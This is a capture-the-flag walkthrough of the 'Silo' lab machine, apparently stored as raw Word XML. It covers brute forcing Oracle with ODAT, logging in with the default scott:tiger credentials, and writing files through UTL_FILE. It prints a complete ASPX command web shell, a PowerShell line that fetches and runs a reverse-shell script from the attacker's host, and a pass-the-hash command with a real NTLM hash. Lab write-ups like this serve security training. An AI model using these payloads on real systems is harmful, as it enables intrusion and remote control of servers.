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Silo</w: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Medium</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an aggressive nmap scan, we see a number of windows ports open. </w:t>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746500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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810250" cy="374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Enumeration</w:t>
      </w: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out RPC and SMB anonymous login, we are unable to authenticate.</w:t>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over to the website on port 80, we find a standard IIS server. First thing we do here is run a fuzz scan to find potential web directories. </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that runs, we also notice nmap reported oracle running on port 1521. Since we know nothing about the oracle instance, we are going to try finding its SID with a tool called ODAT. We simply plug in the ip and port that is running oracle to begin SID guessing (brute forcing).</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this, we find the SID of “XE”</w:t>
      </w:r>
    </w:p>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689100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="28"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8102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python3 odat.py sidguesser -s 10.10.10.82 -p 1521</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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know oracle is the way to go</w:t>
      </w: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 with ODAT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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the SID of the oracle instance, we are going to brute force the login still utilizing ODAT. </w:t>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0861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 odat.py passwordguesser -s 10.10.10.82 -d XE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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the default credentials “scott:tiger” are being used in oracle. Testing these out, we are able to connect to the database as a low privileged user.</w:t>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2371725"/>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816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2381250"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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2289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1266825"/>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959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Sqlplus64 scott/tiger@10.10.10.82/XE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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stands, we do not have many privileges. Attempting to find any sort of database comes back with nothing. We can, however, attempt to login with “sudo” privileges as a database administrator (sysdba). </w:t>
      </w:r>
    </w:p>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1866900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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626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Sqlplus64 scott/tiger@10.10.10.82/XE as sysdba</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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login as “sudo” on the database and find we have more privileges than before. </w:t>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out if file reading works we perform the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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1200" cy="180975"/>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812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2476500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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3054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serverouput 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 utl_file.file_type;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 varchar(200);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begin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 := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');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utl_file.get_line(f,s);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utl_file.fclose(f);</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dbms_output.put_line(s);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6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is doing is allowing output to be placed on our instance, thus allowing us to view file contents. As for the declaration, we are creating the variables f, a file, and s, a character buffer. The file we want is one we know will be on the system. For the case above, we are reading the basic iis text file containing information about it. We are using ‘R’ to read the file only. Once we have opened the file, we store it in the character buffer ‘s’, close the file, then output the contents of ‘s’ onto our screen. </w:t>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running as the database administrator, it may be possible to also write files. If so, then we can create a file on the iis server that contains shellcode for us to use and gain RCE. </w:t>
      </w:r>
    </w:p>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this out, we create a file with commands similar to before, except we are making a file called “helloworld.txt” with content “test”. Doing all this, we successfully create a file on the server and see it run in the web browser.</w:t>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2047875"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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5721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112395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8482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 utl_file.file_type;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 varchar(5000) := 'test';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begin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 := utl_file.fopen('/inetpub/wwwroot', 'helloworld.txt', 'W');</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utl_file.put_line(f,s);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utl_file.fclose(f);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logical step is to upload an aspx script to gain webshell and then RCE. </w:t>
      </w:r>
    </w:p>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this, we get a successful page created</w:t>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19700" cy="2762250"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="5"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2197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10125" cy="1152525"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="26"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8101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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">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2  f utl_file.file_type;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">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3  s varchar(5000) := '&lt;%@ Page Language="C#" Debug="true" Trace="false" %&gt;&lt;%@ Import Namespace="System.Diagnostics" %&gt;&lt;%@ Import Namespace="System.IO" %&gt;&lt;script Language="c#" runat="server"&gt;void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("&lt;pre&gt;");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("&lt;/pre&gt;");}&lt;/script&gt;&lt;HTML&gt;&lt;body &gt;&lt;form id="cmd" method="post" runat="server"&gt;&lt;asp:TextBox id="txtArg" runat="server" Width="250px"&gt;&lt;/asp:TextBox&gt;&lt;asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"&gt;&lt;/asp:Button&gt;&lt;asp:Label id="lblText" runat="server"&gt;Command:&lt;/asp:Label&gt;&lt;/form&gt;&lt;/body&gt;&lt;/HTML&gt;';</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">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  begin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">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5  f := utl_file.fopen('/inetpub/wwwroot', 'ex.aspx', 'W');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">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6  utl_file.put_line(f,s);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">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7  utl_file.fclose(f);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">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8  end;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">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 we do is send a reverse shell back to us for easier enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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135255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8482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powershell iex(new-object net.webclient).downloadstring('http://10.10.14.34:8000/Invoke-PowerShellTcp.ps1')</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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webshell user, we are able to access user “phineas” and their workstation. Inside their desktop is the user flag, but also a file called “Oracle issue.txt”. This file contains a link to a dropbox and the password is provided. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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231900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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8102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this site, we are presented with a password prompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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9718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810250" cy="297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does not seem to work. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Ippsec’s video, he explains that the first character we see, the ‘?’ is not actually a question mark. It is a foreign character. The way he got the correct password was by base64 encoding the file then transferring it to his machine where he decoded it. This strange character occurred due to differences in encoding. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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 to base64 in powershell, we perform the following commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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336800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="27"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8102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6510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81025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771525"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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1244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$fc = Get-Content "Oracle Issue.txt"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 = [System.Text.Encoding]::UTF8.GetBytes($fc)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B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base64 encoded message to our local machine, we finally see the correct dropbox password contains the British Pound symbol. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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1725" cy="819150"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="23"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3717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1650" cy="200025"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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7716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base64 -d b64.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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is “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">£%Hm8646uC$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inside, we find a single file with the “dmp” extension. The note earlier mentioned this was a memory dumb, so it may contain password hashes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">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651000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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810250"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download and unzip this file to get the “dmp” file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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0375" cy="676275"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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000375" cy="676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dmp file, we use volatility. First we need to get the image OS, then use this information to add more information to the command and dump hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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333375"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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505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python vol.py -f /root/htb/silo/SILO-20180105-221806.dmp imageinfo</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
            <w:pPr>
              <w:pageBreakBefore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a long time trying to get volatility to work, but nothing functioned properly. We were going to find what OS image was being used in the dump file, then specify that image in the next command and dump hashes. The hashes dumped contain the administrator LM and NTLM hashes which we use to root the machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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812800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="10"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8102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pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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Downloading ODAT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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ODAT github and clone the repo in a desired location. Then, inside the repo, execute these:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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submodule init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 submodule update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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install some python packages. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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apt-get install libaio1 python3-dev alien python3-pip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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need to install the Oracle client, sdk (development) and sqlplus from the oracle website. The website is: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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jc w:val="cente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https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html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download these RPM packages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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57200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="25"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8102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69900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="17"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8102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44500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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810250" cy="44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downloaded, we need to convert the RPM packages into DEB packages. RPM is used on redhat which is a different architecture. To do this, we execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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alien --to-deb *.rpm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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the newly created DEB packages, we do:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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Dpkg -i *.deb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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need to add a path to our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/profile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Under root, we place the home path of oracle. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">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67350" cy="1485900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="19"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4673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ORACLE_HOME=/usr/lib/oracle/21/client64/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LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib</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PATH=${ORACLE_HOME}bin:$PATH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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the directory may change based on the installed oracle version. To check what version, go to “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/oracle/?????”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the question marks are the version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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install a python library</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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pip3 install cx_Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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reboot the machine and odat should be installed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8.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.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